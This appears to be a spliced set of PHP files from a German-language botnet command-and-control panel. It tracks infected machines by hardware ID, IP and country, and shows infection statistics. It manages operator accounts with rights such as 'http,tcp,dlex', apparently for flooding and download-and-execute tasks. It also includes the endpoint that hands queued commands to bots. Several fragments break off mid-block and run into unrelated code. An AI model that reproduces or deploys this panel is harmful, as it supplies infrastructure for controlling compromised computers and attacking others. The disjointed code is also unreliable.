function get_top20($limit){
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots");
while($row = mysql_fetch_array($query1)){
$alle = $row[count];
}
if($limit){
$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 0,10");
}else{
$query2 = mysql_query("SELECT * FROM bots GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10,20");
}
$array = array();
while($row = mysql_fetch_array($query2)){
$country = safe_xss($row['country']);
$query3 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '".safe_sql($country)."'");
while($row = mysql_fetch_array($query3)){
$zahl = safe_xss($row['count']);
array_push($array,$zahl);
$gesamt = $alle;
$total = safe_xss($zahl/$gesamt*100);
if(!empty($country)){
$countries .= '<label style="display: inline-block; width: 2em;"><img src="../img/flags/'.safe_xss($country).'.gif" OnClick="add(\''.safe_xss($country).',\');" /></label>';
}
}
};
return $countries;
}
//Delete
if(isset($_GET['cmd'])){
$cmd = safe_xss($_GET['cmd']);
mysql_query("DELETE FROM tasks WHERE command = '".safe_sql($cmd)."'");
mysql_query("DELETE FROM tasks_done WHERE command = '".safe_sql($cmd)."'");
echo '<meta http-equiv="refresh" content="0; URL=befehle.php">';
}
if(isset($_GET['deletetasks'])){
if(safe_xss($_GET['del']) == '1'){
$query = mysql_query("SELECT id FROM tasks WHERE bots = done");
while($row = mysql_fetch_array($query)){
$id = safe_xss($row['id']);
$result1 = mysql_query("DELETE FROM tasks WHERE id = '".safe_sql($id)."'");
$result2 = mysql_query("DELETE FROM tasks_done WHERE id = '".safe_sql($id)."'");
}
if(!$result1 || !$result2){
die('<script>alert("Fehler - Kein Task beendet?");</script>
<meta http-equiv="refresh" content="0; URL=befehle.php">');
}else{
echo '<script>alert("Erfolgreich entfernt");</script>
<meta http-equiv="refresh" content="0; URL=befehle.php">';
}
}
if($_GET['del'] == '2'){
$result1 = mysql_query("DELETE FROM tasks");
while($row = mysql_fetch_array($query1)){
$hwid = safe_xss($row['hwid']);
$status = safe_xss($row['status']);
echo '<tr>
<td style="">'.safe_xss($row['id']).'</td>';
if(empty($row['country'])){
echo '<td style=""><img src="img/flags/00.gif" /></td>';
}else{
echo '<td style=""><img src="img/flags/'.safe_xss($row['country']).'.gif" /> '.$options[strtoupper(safe_xss($row['country']))].'</td>';
}
echo '
<td style="">'.safe_xss($row['pc']).'@'.safe_xss($row['hwid']).'@'.safe_xss($row['ip']).'</td>
<td style="">'.safe_xss($row['install']).'</td>
<td style="">'.safe_xss($row['time']).'</td>';
if($status == '1'){
echo '<td style="color: green;">Online</td>';
}else{
echo '<td style="color: red;">Offline</td>';
}
}
echo '</table><br /><div style="float: right; font-size: 11px;">'.$nav->createPageBar().'</div><br />';
$query = "UPDATE bots SET status = 0 WHERE DATE_SUB('$time_now', INTERVAL ".$seconds." SECOND) > time";
mysql_query($query) OR die(mysql_error());
require_once('inc/footer.php'); ?>
<?php
session_start();
require_once('inc/config.php');
require_once('other/safe.php');
if($_SESSION['seclogin']) { header('Location: index.php'); exit(); }
if(isset($_POST['login'])){
$user = $_POST['user'];
$pass = sha1(md5(safe_xss($_POST['pass'])));
$exist = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
if(mysql_num_rows($exist)){
$_SESSION['seclogin'] = true;
$_SESSION['secuser'] = $user;
$q = mysql_query("SELECT * FROM users WHERE user = '******' AND pw = '".safe_sql($pass)."'");
while($row = mysql_fetch_array($q))
{
if($row['admin'] == '1'){
$_SESSION['admin'] = true;
}
}
$error = '<img src="img/accept.png" /> Bitte warten...<meta http-equiv="refresh" content="3; URL=index.php">';
}else{
$error = '<img src="img/del.png" /> Fehlgeschlagen';
}
}
?>
<style type="text/css">
body{
font-size: 11px;
font-family: Tahoma;
}
label{
display: inline-block;
width: 14em;
}
</style>
<?php
require_once('../inc/config.php');
require_once('../other/safe.php');
require_once('../other/code2country.php');
$id = safe_xss($_GET['id']);
$query1 = mysql_query("SELECT * FROM tasks WHERE id = '".safe_sql($id)."'");
while($row = mysql_fetch_array($query1))
{
$split = explode(',', safe_xss($row['countries']));
for($i = 0; $i <= count($split)-2; $i++){
echo '<img src="../img/flags/'.$split[$i].'.gif" /> '.$options[strtoupper($split[$i])].'<br />';
}
}
?>
$query1 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE install LIKE '%$today%'");
while($row = mysql_fetch_array($query1)){
$alle = safe_xss($row[count]);
}
$query2 = mysql_query("SELECT * FROM bots WHERE install LIKE '%$today%' GROUP BY country HAVING count(country) >= 1 ORDER BY count(country) DESC LIMIT 10");
$array = array();
while($row = mysql_fetch_array($query2)){
$country = safe_xss($row['country']);
$query3 = mysql_query("SELECT COUNT(*) AS count FROM bots WHERE country = '$country' AND install LIKE '%$today%'");
while($row = mysql_fetch_array($query3)){
$zahl = safe_xss($row['count']);
array_push($array,$zahl);
$gesamt = $alle;
$total = safe_xss($zahl/$gesamt*100);
if($country == ''){
echo '<tr><td><img src="img/flags/00.gif" /></td><td>'.safe_xss($zahl).'</td><td>'.safe_xss(round($total, 1))."%</td></tr>";
}else{
echo '<tr><td><img src="img/flags/'.safe_xss($country).'.gif" /></td><td>'.safe_xss($zahl). '</td><td>'.safe_xss(round($total, 1)).'%</td></tr>';
}
}
}
echo '</table>';
?>
<?php
if(!$_SESSION['admin']){
echo 'Keine Berechtigung!';
exit();
}
if(isset($_POST['adduser'])){
if($_POST['token'] !== $_SESSION['token3']){
echo 'Token falsch';
exit();
}else{
$user_add = safe_xss($_POST['user']);
$pass_add = safe_xss(sha1(md5($_POST['pass'])));
$rechte_add = safe_xss($_POST['rechte']);
$admin_add = safe_xss($_POST['admin']);
mysql_query("INSERT INTO users (user, pw, rechte, admin) VALUES ('".safe_sql($user_add)."', '".safe_sql($pass_add)."', '".safe_sql($rechte_add)."', '".safe_sql($admin_add)."')");
echo 'Bitte warten... <meta http-equiv="refresh" content="2; URL=benutzer.php">';
}
}else{
$_SESSION['token3'] = uniqid(md5(microtime()), true);
?>
<form action="adduser.php" method="post">
<b>Benutzer</b><p><input type="text" name="user" /></p>
<b>Passwort</b><p><input type="pass" name="pass" /></p>
<b>Rechte</b><p><input type="text" name="rechte" value="z.B http,tcp,dlex" /></p>
<input type="hidden" name="token" value="<?php echo $_SESSION['token3']; ?>" />
<br />
$time_out = safe_xss($row['time']);
//$date_old = new DateTime($time_out);
//$date_new = $date_old->getTimestamp();
$date_old = date_create($row['time']);
$date_new = date_timestamp_get($date_old);
if($date_new <= $time){
$command = $row['command'];
$q2 = mysql_query("SELECT * FROM tasks WHERE command = '".safe_sql($command)."'");
while($row = mysql_fetch_array($q2))
{
$done = safe_xss($row['done']);
$bots = safe_xss($row['bots']);
$add = $done+1;
}
if($done != $bots){
$q3 = "SELECT * FROM tasks_done WHERE hwid = '".safe_sql($hwid)."' AND command = '".safe_sql($command)."'";
$count = mysql_query($q3);
if(!mysql_num_rows($count)){
echo '$'.$command.'$';
mysql_query("UPDATE tasks Set done = '$add' WHERE command = '".safe_sql($command)."'");
mysql_query("INSERT INTO tasks_done
(hwid, command) VALUES
('".safe_sql($hwid)."', '".safe_sql($command)."')");
}
<input type="hidden" name="token" value="'.$_SESSION['token2'].'" />
<input type="hidden" name="id" value="'.safe_xss($id).'" />
<p><b>Zum ändern entweder <b>1</b> (Für Admin Rechte) oder 0 (Für User) schreiben bei Gruppe</b></p>
</form>';
}else{
$_SESSION['token'] = uniqid(md5(microtime()), true);
$query1 = mysql_query("SELECT * FROM users");
while($row = mysql_fetch_array($query1))
{
echo '<tr>
<td>'.admin($row['admin']).'</td>
<td>'.safe_xss($row['user']).'</td>
<td>'.safe_xss($row['rechte']).'</td>
<td><a href="benutzer.php?delid='.safe_xss($row['id']).'&token='.$_SESSION['token'].'" onClick="javascript:return(confirm(\'Benutzer wirklich entfernen?\'))"><img src="img/del.png" /></a></td>
<td><a href="benutzer.php?editid='.safe_xss($row['id']).'"><img src="img/edit.png" /></a></td>
</tr>';
}
echo '<img src="img/add.png" /> <a href="adduser.php" style="color: black; text-decoration: none;">Benutzer hinzufügen</a>';
}
function admin($a){
if($a == '1'){
return 'Admin';
}else{
return 'User';
}
}
?>
</table>